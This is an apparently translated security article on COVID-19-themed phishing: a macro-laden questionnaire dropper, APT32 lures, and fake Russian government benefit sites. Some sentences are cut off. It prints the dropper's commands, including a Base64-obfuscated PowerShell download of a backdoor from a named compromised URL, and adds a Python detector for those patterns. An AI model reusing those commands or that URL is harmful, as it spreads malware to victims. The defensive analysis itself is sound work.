Attackers continue to exploit the COVID-19 topic, creating numerous threats aimed at people who are eager for anything related to the pandemic.
Recall that in
Do you want to be tested for COVID-19 for free?
Another notable example of coronavirus-themed phishing was
Convincing most users to enable macros was also easy. A standard trick was used for this: to fill in the questionnaire, you must first enable macros, which means allowing the VBA script to run.
As you can see, the VBA script was deliberately hidden inside the file.
The Windows choice command has a timeout mode: with /T <seconds> it waits that long before accepting the default answer ('Y'). In our case the script waited 65 seconds before deleting the temporary files:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:\Users\Public\tmpdir\tmps1.bat & del C:\Users\Public\1.txt
While it waited, the malware was downloaded. A separate PowerShell script was launched for this:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:\Users\Public\1.txt
After decoding the Base64 values, the PowerShell script downloads the backdoor from a previously compromised German server:
http://automatischer-staubsauger.com/feature/777777.png
and saves it under the name:
C:\Users\Public\tmpdir\file1.exe
The folder 'C:\Users\Public\tmpdir'
is created when the file 'tmps1.bat' is run; it contains the command cmd /c mkdir ""C:\Users\Public\tmpdir"".
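As an added illustration (not code from the original article), the following Python script takes process-creation command lines like the ones above, decodes the Base64 literals, and flags the delayed self-deletion, WebClient download and split-string patterns that make this dropper recognisable in endpoint telemetry. The sample command lines are constructed to mirror the dropper described here.

```python
import base64
import re

# Constructed sample command lines modelled on the dropper described above
# (the Base64 literals decode to the URL and path the article gives).
SAMPLE_CMDLINES = [
    "cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:\\Users\\Public\\tmpdir\\tmps1.bat"
    " & del C:\\Users\\Public\\1.txt",
    "cmd /C powershell -Command \"(New-Object Net.WebClient).DownloadFile("
    "[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("
    "'aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw=='))"
    ", [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("
    "'QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e')\"",
    "cmd /c mkdir \"C:\\Users\\Public\\tmpdir\"",   # benign-looking helper, no score
]

B64_RE = re.compile(r"FromBase64String\('([A-Za-z0-9+/=]+)'\)")
# 'choice ... /T <n>' inside the same cmd segment (before any & or |)
CHOICE_RE = re.compile(r"\bchoice\b[^&|]*?/T\s+(\d+)", re.IGNORECASE)
# two or more short quoted fragments joined with '+', e.g. '1' + '.e' + 'x' + 'e'
CONCAT_RE = re.compile(r"(?:'[^']{1,3}'\s*\+\s*){2,}'[^']{1,3}'")

def decode_b64_args(cmdline):
    """Decode every FromBase64String('...') literal that yields printable ASCII."""
    out = []
    for token in B64_RE.findall(cmdline):
        try:
            out.append(base64.b64decode(token, validate=True).decode("ascii"))
        except (ValueError, UnicodeDecodeError):
            continue
    return out

def join_concat(expr):
    """Collapse a '1' + '.e' + 'x' + 'e' style concatenation into its literal value."""
    return "".join(re.findall(r"'([^']*)'", expr))

def analyze_cmdline(cmdline):
    """Return a score, a list of tags and the decoded Base64 strings for one command line."""
    findings = {"score": 0, "tags": [], "decoded": decode_b64_args(cmdline)}
    m = CHOICE_RE.search(cmdline)
    if m and re.search(r"\bdel\b", cmdline, re.IGNORECASE):
        findings["tags"].append("delayed_self_delete:%ss" % m.group(1))
        findings["score"] += 3
    if "DownloadFile" in cmdline:
        findings["tags"].append("webclient_download")
        findings["score"] += 2
    for d in findings["decoded"]:
        if d.lower().startswith(("http://", "https://")):
            findings["tags"].append("b64_url:" + d)
            findings["score"] += 2
    for c in CONCAT_RE.findall(cmdline):
        findings["tags"].append("split_string:" + join_concat(c))
        findings["score"] += 1
    return findings
```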
A targeted attack on government agencies
In addition, FireEye analysts recently reported a targeted attack by APT32 aimed at government structures in Wuhan, as well as at the Chinese Ministry of Emergency Management. One of the distributed RTF files contained a link to a New York Times article titled
Interestingly, at the time of detection none of the antivirus engines flagged the sample, according to VirusTotal.
When the official websites fail
The most striking example of a phishing attack occurred in Russia just the other day. The reason for it was the announcement of a long-awaited benefit for children aged 3 to 16. When the start of application acceptance was announced on May 12, 2020, millions rushed to the State Services (Gosuslugi) portal to get the long-awaited help and brought the portal down no less effectively than a professional DDoS attack. When the president stated that "State Services could not cope with the flow of applications," people began talking online about the opening of another site to accept applications.
The problem is that several sites started operating at once, and while one of them, the real posobie16.gosuslugi.ru, actually accepted applications, more than
Colleagues from SearchInform found about 30 new fake pages in the .ru zone. Infosecurity and Softline Company have tracked more than 70 fake government services sites since the beginning of April. Their creators use familiar brand elements and combinations of the words gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie, and the like.
Hype and social engineering
All these examples only confirm that attackers are successfully exploiting the coronavirus topic. The more social tension and uncertainty grow, the more opportunities scammers have to steal important data, pressure people into paying money, or simply compromise large numbers of computers.
And given that the pandemic has forced unprepared people to work from home en masse, not only personal but also corporate data is at risk. For example, Microsoft 365 (formerly Office 365) users recently faced a phishing attack as well. People received "missed" voice messages as attachments to emails. However, the files were actually an HTML page that redirected the victims of the attack
Source: www.habr.com